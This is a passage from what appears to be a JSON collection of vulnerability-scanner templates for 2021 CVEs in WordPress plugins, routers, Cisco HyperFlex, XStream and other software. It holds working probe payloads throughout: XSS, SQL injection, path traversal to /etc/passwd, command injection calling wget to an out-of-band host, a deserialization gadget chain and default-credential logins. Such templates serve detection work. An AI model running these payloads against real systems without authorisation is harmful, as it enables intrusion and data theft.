{{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34640","info":{"name":"WordPress Securimage-WP-Fixed <=3.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET //wp-admin/options-general.php/\"></script><script>alert(document.domain)</script>/script%3E?page=securimage-wp-options%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31249","info":{"name":"CHIYU TCP/IP Converter - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: setting.htm","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-24472","info":{"name":"Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26475","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</title><script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24387","info":{"name":"WordPress Pro Real Estate 7 Theme <3.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","/wp-content/themes/realestate"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46379","info":{"name":"D-Link DIR850 ET850-1.08TRb03 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-27561","info":{"name":"YeaLink DM 3.6.0.20 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid","gid","groups"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-24291","info":{"name":"WordPress Photo Gallery by 10Web <1.5.69 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\"%20onmouseover=alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["onmouseover=alert(document.domain)//","wp-content/uploads/photo-gallery"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27309","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>.php"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37216","info":{"name":"QSAN Storage Manager <3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http_header.php"],"headers":{"X-Trigger-XSS":"<script>alert(1)</script>"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(header), 'x-xss-protection')"]},{"type":"word","part":"body","words":["\"HTTP_X_TRIGGER_XSS\":\"<script>alert(1)</script>\""]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-37833","info":{"name":"Hotel Druid 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1","{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1","{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1","{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24407","info":{"name":"WordPress Jannah Theme <5.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=tie_ajax_search&query[]=</script><script>alert(document.domain)</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25112","info":{"name":"WordPress WHMCS Bridge <6.4b - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<strong><img src onerror=alert(document.domain)></strong>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21389","info":{"name":"BuddyPress REST API  <7.2.1 - Privilege Escalation/Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-json/buddypress/v1/signup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\n  \"user_login\":\"{{randstr}}\",\n  \"password\":\"{{randstr}}\",\n  \"user_name\":\"{{randstr}}\",\n  \"user_email\":\"{{randstr}}@interact.sh\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["user_login","registered","activation_key","user_email"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45380","info":{"name":"AppCMS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"\"></script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28854","info":{"name":"VICIdial Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/agc/vicidial_mysqli_errors.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["text/plain"],"part":"header"},{"type":"status","status":[200]},{"type":"word","words":["vdc_db_query"],"part":"body"}]}]},{"id":"CVE-2021-44451","info":{"name":"Apache Superset <=1.3.2 - Default Login","severity":"medium"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf_token}}&username={{username}}&password={{password}}\n","GET /dashboard/list/ HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["session"]},{"type":"word","part":"body_3","words":["DashboardFilterStateRestApi"]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["name=\"csrf_token\" type=\"hidden\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-24946","info":{"name":"WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"The event is finished\") || contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2021-32305","info":{"name":"Websvn <2.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-40960","info":{"name":"Galera WebTemplate 1.0 Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29505","info":{"name":"XStream <1.4.17 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n    <unserializable-parents/>\n    <java.util.PriorityQueue>\n        <default>\n            <size>2</size>\n        </default>\n        <int>3</int>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\n                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\n                    <parsedMessage>true</parsedMessage>\n                    <soapVersion>SOAP_11</soapVersion>\n                    <bodyParts/>\n                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\n                        <attachmentsInitialized>false</attachmentsInitialized>\n                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\n                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>\n                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>\n                                    <names>\n                                        <string>aa</string>\n                                        <string>aa</string>\n                                    </names>\n                                    <ctx>\n                                        <environment/>\n                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>\n                                            <java.rmi.server.RemoteObject>\n                                                <string>UnicastRef</string>\n                                                <string>{{interactsh-url}}</string>\n                                                <int>1099</int>\n                                                <long>0</long>\n                                                <int>0</int>\n                                                <long>0</long>\n                                                <short>0</short>\n                                                <boolean>false</boolean>\n                                            </java.rmi.server.RemoteObject>\n                                        </registry>\n                                        <host>{{interactsh-url}}</host>\n                                        <port>1099</port>\n                                    </ctx>\n                                </candidates>\n                            </aliases>\n                        </nullIter>\n                    </sm>\n                </message>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n    </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-1498","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /storfs-asup HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31856","info":{"name":"Layer5 Meshery 0.5.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28937","info":{"name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.html"],"matchers-condition":"and","matchers":[{"type":"word","words":["Password Setting","addCfg('username'","addCfg('newpass'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43725","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>","name=\"data[performredirect]"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36873","info":{"name":"WordPress iQ Block Country <=1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=iqblockcountry-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Diq-block-country%2Flibs%2Fblockcountry-settings.php&blockcountry_blockmessage=test</textarea><script>alert(document.domain)</script>&blockcountry_redirect=2&blockcountry_redirect_url=&blockcountry_header=on&blockcountry_nrstatistics=15&blockcountry_daysstatistics=30&blockcountry_geoapikey=&blockcountry_apikey=&blockcountry_ipoverride=NONE&blockcountry_debuglogging=on\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, 'blockcountry_blockmessage\\\">test</textarea><script>alert(document.domain)</script>')","contains(body_4, '<h3>Block type</h3>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-21287","info":{"name":"MinIO Browser API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /minio/webrpc HTTP/1.1\nHost: {{interactsh-url}}\nContent-Type: application/json\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36\nContent-Length: 76\n\n{\"id\":1,\"jsonrpc\":\"2.0\",\"params\":{\"token\":  \"Test\"},\"method\":\"web.LoginSTS\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["We encountered an internal error"]}]}]},{"id":"CVE-2021-41878","info":{"name":"i-Panel Administration System 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=a onerror=alert(\"document.domain\")>","i-Panel Administration"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-23241","info":{"name":"MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginLess/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20124","info":{"name":"Draytek VigorConnect 6.0-B3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd","{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37304","info":{"name":"Jeecg Boot <= 2.4.5 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/actuator/httptrace/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"traces\":[","\"headers\"","\"request\":{"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24227","info":{"name":"Patreon WordPress  <1.7.0 - Unauthenticated Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24436","info":{"name":"WordPress W3 Total Cache <2.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension=\"%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '><script>alert(document.domain)</script>&action=view')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-36749","info":{"name":"Apache Druid - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","druid:*:1000:1000:"],"condition":"or"}]}]},{"id":"CVE-2021-35464","info":{"name":"ForgeRock OpenAM <7.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/oauth2/..;/ccversion/Version"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Set-Cookie: JSESSIONID="]},{"type":"word","part":"body","words":["Version Information -","openam/ccversion/Masthead.jsp"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31862","info":{"name":"SysAid 20.4.74 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["(body == \"false <script>alert(document.domain)</script>\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-20323","info":{"name":"Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/realms/master/clients-registrations/default","{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect","{{BaseURL}}/realms/master/clients-registrations/default","{{BaseURL}}/realms/master/clients-registrations/openid-connect"],"body":"{\"Test<img src=x onerror=alert(document.domain)>\":1}","stop-at-first-match":true,"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unrecognized field \"Test<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-25052","info":{"name":"WordPress Button Generator <2.3.3 - Remote File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22214","info":{"name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true"],"body":"{\"content\": \"include:\\n  remote: http://127.0.0.1:9100/test.yml\"}\n","headers":{"Content-Type":"application/json"},"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","part":"body","words":["does not have valid YAML syntax"]}]}]},{"id":"CVE-2021-24731","info":{"name":"Pie Register < 3.7.1.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-json/pie/v1/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nuser_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"User credentials are invalid.\")"],"condition":"and"}]}]},{"id":"CVE-2021-28419","info":{"name":"SEO Panel 4.8.0 - Blind SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: _csrf={{rand_base(54,\"abc\")}};\n","POST /login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}login.php\nCookie: _csrf={{rand_base(54,\"abc\")}};\n\nsec=login&red_referer=http%3A%2F%2F{{BaseURL}}&userName={{username}}&password={{password}}&login=\n","GET /archive.php?from_time=2021-04-25&order_col=(SELECT+7397+FROM(SELECT(SLEEP(3)))test)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id= HTTP/1.1\nHost: {{Hostname}}\nCookie: _csrf={{rand_base(54,\"abc\")}};\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_3>=6","status_code_3 == 200","contains(body_3, \"Overall Report Summary\")"],"condition":"and"}]}]},{"id":"CVE-2021-45967","info":{"name":"Pascom CPS Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24510","info":{"name":"WordPress MF Gig Calendar <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=\"></script><script>alert(document.domain)</script><\" HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44427","info":{"name":"Rosario Student Information System Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/Side.php"],"body":"sidefunc=update&syear=111'","headers":{"Content-Type":"application/x-www-form-urlencoded; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB Execute Failed. ERROR:","unterminated quoted string"],"condition":"and"},{"type":"word","part":"header","words":["RosarioSIS="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3002","info":{"name":"Seo Panel 4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /seo/seopanel/login.php?sec=forgot HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","seopanel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39320","info":{"name":"WordPress Under Construction <1.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php/\"><script>alert(document.domain)</script>/?page=under-construction HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"/wp-admin/admin.php/\"><script>alert(document.domain)</script>","under-construction"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24300","info":{"name":"WordPress WooCommerce <1.13.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: 